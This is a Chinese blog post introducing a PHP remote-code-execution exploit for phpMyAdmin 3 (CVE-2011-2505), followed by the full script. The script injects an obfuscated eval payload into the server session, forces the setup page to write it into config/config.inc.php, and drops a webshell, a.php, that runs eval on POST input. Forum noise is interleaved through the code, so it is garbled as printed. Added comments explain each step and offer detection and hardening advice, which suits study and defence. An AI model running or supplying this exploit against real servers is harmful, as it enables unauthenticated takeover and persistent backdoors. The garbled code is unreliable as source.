最近在家做专职奶爸,不谙圈内事很多个月了,博客也无更新。

昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了番,写出了这个冷饭exp,由于我搞得晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。

首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。

在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。

于是写了这个php版本的exp,代码如下:

#!/usr/bin/php
9 q& x% ]+ M+ o6 r% I% Z' s9 L<?php/ f8 d2 V) h8 r8 w, M! u
// Proof-of-concept for CVE-2011-2505 (phpMyAdmin 3; the id is taken from the
// banner below), reproduced exactly as it appeared in the post. The stray
// fragments such as "9 q& x% ..." on most lines look like copy-protection
// noise added by the forum rather than part of the script, and the text as
// printed is not runnable until they are removed. Read it as a walkthrough
// of the attack chain for detection and hardening: every step is one plain
// HTTP request built by php_request() (defined at the bottom of the file).
print_r('
; X4 w/ q! ^" B6 f1 V5 Y+---------------------------------------------------------------------------+4 {8 \ t+ N' p( m7 n
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]2 h+ s9 C! y! d7 {
by oldjun(www.oldjun.com)
; V+ O1 |& W5 d1 F- a1 J3 i9 H0 c' Nwelcome to www.t00ls.net) _8 X/ ]7 S5 n7 Q" K& q
mail: oldjun@gmail.com* t3 \1 I$ A8 r) |# C: m. f
Assigned CVE id: CVE-2011-2505
9 \; ?; P5 s S; ?0 l' b+---------------------------------------------------------------------------+ `( l9 |2 A/ Q# m+ t' P
');- o6 h. Z4 B/ x/ s* I/ F
+ S( D0 { s2 L2 ^. v4 |/**
" A) X0 X# W( }' }( S% I& V * working when the directory:"config" exists and is writeable.
/ s% e- L9 ^3 M, k4 h7 E* P8 {9 K**/
// Hardening note: that precondition is the one defenders control. A deployed
// phpMyAdmin should not keep a web-writable config/ directory; without it the
// chain below fails at its last step (see the final check).
3 E3 s5 o/ d( ~4 K y9 J7 ~4 X4 y+ ~- t
// Usage guard: two positional arguments (host, path) are required; with fewer
// the usage text is printed and the script exits.
if ($argc < 3) {
8 O0 H* a- U% ?+ W print_r('
* C3 x1 h' A* g: ~: A8 Z) m+---------------------------------------------------------------------------+
8 [2 ~: K5 W: O& t6 |- [Usage: php '.$argv[0].' host path
: K. ]$ m* C3 G1 Thost: target server (ip/hostname)0 g8 d/ W H& T O
path: path to pma3
: U4 V) ~1 N( J+ K a) w3 V9 ?Example:
) \6 Q9 m; T5 Z7 M0 d- fphp '.$argv[0].' localhost /pma/
- `1 Z0 H( ]; D& W5 y- q4 S% W6 G3 L+---------------------------------------------------------------------------+
$ B' J6 H" A$ ^. y( G');
. G6 h \$ n$ X/ E: C9 C( L exit;9 E% Z- Z/ H0 r7 h
}
/ e+ Z# p3 y B0 C
// Target host and the URL prefix of the phpMyAdmin install. php_request()
// reads both through `global`, so they must be assigned before the first
// call. $path is prepended verbatim to every request URL; the usage example
// shows the expected form with a trailing slash ("/pma/").
r* S. h# w0 K; Y$ L5 s$host = $argv[1];& X h$ b+ j- L) E0 \$ J) {2 O$ E
$path = $argv[2];
, H$ n4 T# \3 \; ?1 i4 J0 s- X* B+ i/ p1 a) q
/**9 `6 c' @% c. |, N
* Try to determine if the directory:"config" exists8 t6 F2 i4 _1 a' Z: \* l9 N5 Z7 t
**/4 i- u2 D( R8 g9 I) U$ Q
// Step 1: GET <path>config/ and treat any "404" anywhere in the raw response
// (status line, headers and body are one string here) as "directory absent".
// strpos() is used as a boolean, so this is only as reliable as the server's
// error page format; a false positive merely aborts the script.
echo "[+] Try to determine if the directory:config exists....\n";+ U i+ P% D0 ~/ e# J; x
$returnstr=php_request('config/');
8 ?& Q. P! D' z& ?2 B2 ` _- Qif(strpos($returnstr,'404')){
$ g+ ?* ^+ R/ g; B1 @ exit("[-] Exploit Failed! The directory:config do not exists!\n");
$ e& i2 o5 ?6 s1 z) v9 J}
+ t8 [$ H- @' j# n+ z! C8 z) n5 v' S' U& X$ [& y% L' F& L" v
/**1 m9 R: D# d5 I: W( J5 h; U6 o/ G
* Try to get token and sessionid& t( y `8 p! q" U* x& F
**/
// Step 2: a single GET of index.php with no credentials. The regex pulls out
// the value of the "phpMyAdmin" session cookie (presumably from the Set-Cookie
// header) and the 32-char "token" that phpMyAdmin embeds in its links; both
// are replayed in every later request. Nothing in this script ever
// authenticates, which is what makes the issue pre-auth.
6 Z" P8 c) ?) {$ [echo "[+] Try to get token and sessionid....\n";
0 J6 V& c: t0 ^ S$ `; s0 t( V$result=php_request('index.php');
9 T% @! B% Q' P( Y3 t0 cpreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);# E9 W) ]8 D1 C4 k
$token=$resp[3];1 E$ k; Z, _0 z
$sessionid=$resp[1];
( w v! D( F2 l' y+ H& |if($token && $sessionid){0 j, i; Y9 X7 @$ x- y! |3 H
// The two echoes below print the literal words "token"/"sessionid"; the "$"
// sigils were most likely lost when the post was extracted.
echo "[+] token token\n";/ I9 A+ \ p' s( P/ P: x# H) M# f
echo "[+] Session ID sessionid\n";
4 A7 \* G9 v ^! w}else{3 z* v( X9 |% D& e0 w3 e5 H0 _$ P
exit("[-] Can't get token and Session ID,Exploit Failed!\n");: C' f6 t4 h y0 U
}: M, D- s$ n( C0 c
" b5 _- n" H# F% {/**. |, F7 u5 B x/ c) |5 k' G
* Try to insert shell into session
R6 E" p- _3 k1 B**/
// Step 3 -- the vulnerability itself. The query string names a $_SESSION entry
// directly ("_SESSION[ConfigFile][Servers][...][host]"); per the author's step
// comment and the CVE in the banner, affected phpMyAdmin 3 versions apparently
// let such a request write that entry into the server-side session. The array
// key is "*/eval(...);/*": the chr() chain is plain obfuscation of a one-liner
// that writes a.php containing eval($_POST[cmd]) and echoes "t00ls" -- the same
// two strings the success check below looks for. The comment delimiters around
// the key presumably let it break out of wherever the config writer quotes it.
// Detection: a "_SESSION[" key in a query string to any phpMyAdmin page is not
// something a browser session produces; alert on it. The author's trailing note
// says db_create.php is interchangeable with most other pma3 pages here.
2 m' }, ?# ^ [; ?echo "[+] Try to insert shell into session....\n";
( ?) N: y& c5 D! ?+ y ^php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.* o9 a' P# z/ h# P* k: t
. b; m+ P2 K( g, L( S; o' w4 ~0 v/**$ v+ \ P% }/ W- K
* Try to create webshell+ F0 X- a! Y1 b. _# Z
**/
// Step 4: POST to setup/config.php with submit_save=Save, replaying the cookie
// and token from step 2. The setup page then presumably writes the session-held
// configuration -- injected key included -- to config/config.inc.php, which is
// why config/ has to be writable. The form body is concatenated by hand with
// no urlencode().
8 Q5 ^- \+ g6 t. H( n0 cecho "[+] Try to create webshell....\n";
. U; T1 P" t# T' `: Dphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);, v! `% W2 N7 |
/**/ F! ?' X- {- u, l5 I) l
* Try to check if the webshell was created successfully
) p5 b$ \& @. s M; u) q+ n( {% ^**/! r& R3 K, m) [
// Step 5: GET config/config.inc.php and look for the marker "t00ls", which the
// injected one-liner echoes when that file is executed. On success the dropped
// file is reported at <host><path>config/a.php; the failure message lists the
// likely causes. Hardening: a web-reachable, writable config/ whose contents
// are executed is the root issue -- remove or deny access to config/ once
// setup is done.
echo "[+] Try to check if the webshell was created successfully....\n";
4 }* l' r$ j: |2 G$ V$content=php_request('config/config.inc.php');9 x# F5 k h7 G( }: K& N# Q8 z/ t
if(strpos($content,'t00ls')){% G: t. J# V/ T2 C. u3 \6 U
echo "[+] Congratulations! Expoilt successfully....\n";
( A+ w/ W4 H0 i& r% M echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";$ ^/ N. j2 ~$ C5 W" ^# ^
}else{0 B( w3 C! Q3 y+ s8 E' Q& f' ?
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");0 ~, O# F$ G! j3 ?2 I8 P
}5 L5 e3 p. o+ o! X" \
3 n0 w1 K8 e( F; }/ |# ]
/**
 * Minimal hand-rolled HTTP/1.1 client used by every step above.
 *
 * @param string $url    path appended verbatim to the global $path (no
 *                       urlencode(); callers pass query strings as-is).
 * @param string $data   request body. When truthy the request is a POST with
 *                       a form-urlencoded Content-Type and a computed
 *                       Content-Length; otherwise a GET. Note that "" and "0"
 *                       both count as "no body" here.
 * @param string $cookie raw Cookie header value; the header is omitted when
 *                       empty.
 * @return string the raw response -- status line, headers and body in one
 *                string -- read until the server closes the connection,
 *                which "Connection: Close" asks it to do.
 *
 * Reads $host and $path from the script's globals. Connects in the clear to
 * port 80 via fsockopen() with PHP's default timeout; on connect failure it
 * prints a message and die()s instead of returning, so no caller ever sees a
 * failed request, and the socket is never fclose()d. The User-Agent
 * "MSIE 6.00" (two zeros) is not what a real browser sends, so it is a
 * usable access-log fingerprint for this script.
 */
function php_request($url,$data='',$cookie=''){) r8 n/ B; g w" ]) E% v/ |1 v. d7 z' b
global $host, $path;
3 L/ R# D6 t' }) d8 w
// POST iff a body was supplied (truthiness, see docblock).
$ y5 \; Y' x( R $method=$data?'POST':'GET';* V- A) u7 a! u2 h: b' V# C# u% K
: M) V, K6 Y# T8 M; e
// Request line and headers are assembled by hand, CRLF-terminated.
$packet = $method." ".$path.$url." HTTP/1.1\r\n";3 _+ m( a: f% S9 |* N f
$packet .= "Accept: */*\r\n";
2 f0 s# n+ a6 P9 E6 i6 K" [ $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";% C% q* P5 G$ w& }! Z% X8 C
$packet .= "Host: $host\r\n";
" z# O- |( ]9 w7 |+ d $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
- `/ D/ b8 K) F( C7 T8 ] w1 q $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
, C$ r0 J# b5 I( \# v7 _ $packet .= $cookie?"Cookie: $cookie\r\n":"";+ S* R/ Y! g) a8 E' M" W
$packet .= "Connection: Close\r\n\r\n";
// The body follows the blank line only when one was supplied.
5 {# w3 n2 @: e% h: e $packet .= $data?$data:"";! y' E. D3 }7 Q! E" c( g
6 C4 G$ W7 M8 y: q
// Plain TCP to a hard-coded port 80; no TLS, no explicit timeout.
$fp = fsockopen(gethostbyname($host), 80);
4 Y% `$ H: X- n' q/ V7 J, y if (!$fp) {
& Y* P7 D6 G6 w$ P; d, b echo 'No response from '.$host; die;
% P% z% b1 w# S# K7 i4 l8 ^( g5 j }
+ R2 R' X, g1 N4 @ fputs($fp, $packet);( R( t; ^$ Z9 R
+ T' z }* I6 I, J8 M& A% ~
// Drain the socket to EOF in 1 KiB chunks. Nothing parses the status line or
// headers; callers substring-search the whole response.
$resp = '';3 R! b X8 ^& D) {* X
5 f( z3 A' T1 g% p x! b while ($fp && !feof($fp))
% E% U/ m) Q7 S $resp .= fread($fp, 1024);# N# _5 I; [ D. X
% q5 H# ~0 K) Q0 t6 \) k return $resp;
4 Q) A, O1 g, |. Y: i9 ^}
: [/ s6 D9 w4 }2 t2 c5 d# Q6 A 8 ^1 ^1 x b- m! h: q# |9 ?5 J4 t
?>
' s) A0 @8 ]& j* `5 o. |